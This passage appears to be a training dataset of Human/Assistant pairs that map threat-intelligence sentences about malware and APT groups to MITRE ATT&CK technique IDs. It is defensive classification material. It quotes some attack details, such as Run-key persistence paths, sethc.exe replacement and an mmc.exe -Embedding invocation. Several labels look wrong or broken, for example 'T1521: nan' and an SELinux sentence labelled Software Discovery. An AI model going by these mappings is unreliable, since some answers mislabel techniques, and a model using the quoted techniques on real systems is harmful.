MITRE ATT&CK framework.,APT34 has a tool called CANDYKING to capture a screenshot of user's desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat relies on users clicking on an embedded image to execute the scripts.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has the ability to uninstall itself by deleting its service and files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has decoded its PowerShell script.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker has used a DGA that seeds with the current UTC victim system date to generate domains.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,.sdb### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used netstat -ano | findstr EST to discover network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch can download and execute or update malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has connected to C2 servers through proxies.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with .Md5.exe, and if the program is executed from the root of the C:\ drive, as well as checks for sandbox-related libraries.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe can hide legitimate directories and replace them with malicious copies of the same name.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This file controls what mode SELinux is in.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., MBR + overwrite/wipe### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used the Windows API to make detection more difficult.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has established persistence via the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and a shortcut within the startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition systems.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has added batch scripts to the startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Returns the screenshot to the C2 via:
111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used Themida to pack at least two separate backdoor implants.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some specifics from in-the-wild use include: * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened Template Injection.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has served fake updates via legitimate websites that have been compromised.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This hash does not allow pass-the-hash style attacks, and instead requires Password Cracking to recover the plaintext password.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has accessed files to gain valid credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan uses the access token to write the string above to the first file uploaded to Google drive whose filename is .txt### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Responds to the IRC server via PRIVMSG with “Download  Success :FilePath=” or “Download Fail” if unsuccessful### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has executed the whoami command.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used VBS scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can identify the installed antivirus engine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has masqueraded as a JPG image file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used HTTP to communiate with C2 nodes.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon deletes backups and shadow copies using native system tools.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra has acquired open source tools such as NBTscan and Meterpreter for their operations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,httpclient encrypts C2 content with XOR using a single byte, 0x12.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most of the PowerShell commands would call Windows Management Instrumentation (WMI)### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould can copy files on a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This field contains a URL that the Trojan will use to upload the contents of the .txt file, which will be structured as . where the process ID is encoded with the same character substitution function as seen previously in Table 4### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo discovers shares on the network PlugX has a module to enumerate network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Starloader has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can encode data with a NOT operation before sending the data to the control server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Configuration data used by Rising Sun is encrypted using RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin gathers the IP address and domain from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet decrypts resources that are loaded into memory and executed.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire credentials from web browsers by reading files specific to the target browser.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has used user mode rootkit techniques to remain hidden on the system.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak can create a Windows account.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TDTESS provides a reverse shell on the victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use SID-History Injection to escalate privileges and bypass access controls.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access remote objects interactively from the pupy shell and get auto-completion of remote attributes### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most Linux and Linux-based platforms provide a standard set of permission groups and a standard set of permissions that are applied to each group.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get information about running processes on a system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has saved files with hidden file attributes.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The first 11 bytes of the received buffer are encrypted with the XOR algorithm### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used Word documents with VBScripts to execute malicious activities.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind has a command to return a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can exfiltrate files over C2 infrastructure.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has used HTTP POST requests to communicate with its C2 server to receive commands.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy's uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The built-in Windows command-line utility Reg may be used for local or remote Registry modification.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other accessibility features exist that may also be leveraged in a similar fashion: * On-Screen Keyboard: C:\Windows\System32\osk.exe * Magnifier: C:\Windows\System32\Magnify.exe * Narrator: C:\Windows\System32\Narrator.exe * Display Switcher: C:\Windows\System32\DisplaySwitch.exe * App Switcher: C:\Windows\System32\AtBroker.exe APT3 replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HARDRAIN uses cmd.exe to execute netshcommands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has used PowerShell Empire for execution of malware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has used various open-source tools for privilege escalation purposes.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used base64-encoded files that are dropped to victims.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has been delivered via phishing emails which contained malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly dropped and executed SecretsDump, a tool that dumps password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL can communicate over SMTP and POP3 for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Metasploit Bind and Reverse TCP stagers.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to identify network settings on a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,63 64 ku64.dll ku32.dll Keylogger & clipboard monitor### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drive-by content can be staged on adversary controlled infrastructure that has been acquired or previously compromised .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL collects MAC address and local IP address information from the victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird deletes its payload along with the payload's parent process after it finishes copying files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A custom XOR cipher or RC4 is used for decryption.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note that IP addresses can be reallocated### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.Newer versions of TrickBot have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also tamper with artifacts deployed and utilized by security tools.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used netsh to configure firewall rules that limited certain UDP outbound packets.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use AES encryption for C2 data transferred.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HDS Deletes the file created by the HD command to reverse the effect### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis deploys additional backdoors and hacking tools to the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used AUDITPOL to prevent the collection of audit logs.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz obtains the victim username and saves it to a file.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SslMM contains a feature to manipulate process privileges and tokens.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cleaver has used custom tools to facilitate ARP cache poisoning.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack’s C2 proxy tool sends data to a C2 server over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can use a HTTP GET request to download its final payload.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT has a command to obtain a directory listing.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: CVE-2017-11882 and POWRUNER attack sequence The malicious .rtf file exploits CVE-2017-11882### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used DNS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader has a command to collect the victim's IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used legitimate credentials to hijack email communications.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has sent spearphishing emails containing malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can use DriveList to retrieve drive information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use TLS in C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has deleted the exfiltrated data on disk after transmission.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information this malware collected included the following:The computer nameThe usernameThe execution path of the sampleThe BIOS modelA randomly-generated ID to uniquely identify the systemGroup123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto uses the zip -r command to compress the data collected on the local system.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has created Registry keys for persistence in HKLM|HKCU\…\CurrentVersion\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has collected data from victims' local systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM established persistence for PoisonIvy by created a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used PowerShell on victim systems to download and run payloads after exploitation.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used attempted to lure victims into opening malicious e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro has the ability to download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can launch port scans.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can decrypt password-protected executables.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework., After the initial dropper (qrat.exe) has been executed by the embedded scriptlet, it creates a directory in C:\Users\%username%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0 and unpacks/drops the final QuasarRAT binary named microsoft_network.exe### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of ""License.txt"" and exiting.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 will copy files over to Windows Admin Shares as part of lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: AuditCred/ROptimizer Service If successfully installed, this particular backdoor poses quite a threat to its target### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has used WMI to execute powershell.exe.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These parameters install it as a service### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1 